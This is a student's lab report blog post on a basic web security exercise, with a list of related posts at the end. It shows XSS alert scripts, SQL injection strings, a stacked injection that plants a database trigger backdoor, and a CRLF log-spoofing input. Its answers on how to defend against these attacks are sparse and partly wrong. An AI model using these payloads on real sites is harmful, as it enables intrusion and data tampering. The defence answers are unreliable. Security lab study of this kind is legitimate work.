20145207 Exp9 web安全基础实践
2017-05-10 09:42
225 查看
Exp9 web安全基础实践
实验后回答问题
(1)SQL注入攻击原理,如何防御攻击原理:修改信息
防御:禁止输入
(2)XSS攻击的原理,如何防御
攻击原理:看别人的博客,感觉就是强制访问。
防御:。。。。。不清楚
(3)CSRF攻击原理,如何防御
没做,不知道
实验总结与体会
指导下完成,就完成个最低标准吧XSS注入攻击
Stored XSS Attacks
代码: <script> alert("Hi"); </script>
截图(没法体现学号信息,自己加个水印):
Reflected XSS Attacks
代码:http://www.targetserver.com/search.asp?input=<script>alert("Hi");</script>
截图:
Numeric SQL Injection
通过注入SQL字符串,在101旁边加上or 1=1:Database Backdoors
实验目的是实现多条SQL语句的注入,在userid中输入101 or 1=1;--
试验成功
Database Backdoors 2
插入两个SQL语句代码(拷贝的):101 or 1=1;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid;
实验成功
log Spoofing
在用户名中添加hhc%0d%0aLogin Succeeded盲数字注入(Blind Numeric SQL Injection)
存放在pins表中值pin的内容,行号cc_number=1111222233334444,是一个int型最后
相关文章推荐
- 20145325张梓靖 《网络对抗技术》 Web安全基础实践
- 20145215《网络对抗》Exp9 Web安全基础实践
- 20145304 Exp9 Web安全基础实践
- 20145302张薇 《网络对抗技术》 web安全基础实践
- 20145314郑凯杰《网络对抗技术》实验9 web安全基础实践
- 20145320周岐浩 web安全基础实践
- 20145336 张子扬 《网络对抗技术》 web安全基础实践
- 20145223 杨梦云 《网络对抗》 Web安全基础实践
- 20145201李子璇 《网络对抗》 Web安全基础实践
- 20145233《网络对抗》Exp9 Web安全基础实践
- 20145204张亚军——web安全基础实践
- 20145229吴姗姗web安全基础实践
- 20145311王亦徐 《网络对抗技术》 Web安全基础实践
- 20145321 《网络对抗技术》 Web安全基础实践
- 20145306 网路攻防 web安全基础实践
- 20145212 罗天晨 Web安全基础实践
- 20145214 《网络对抗技术》 Web安全基础实践
- 20145231熊梓宏 《网络对抗》 实验9 Web安全基础实践
- 20145317彭垚《网络对抗》Exp9 Web安全基础实践
- 20145301赵嘉鑫 《网络对抗》Exp9 Web安全基础实践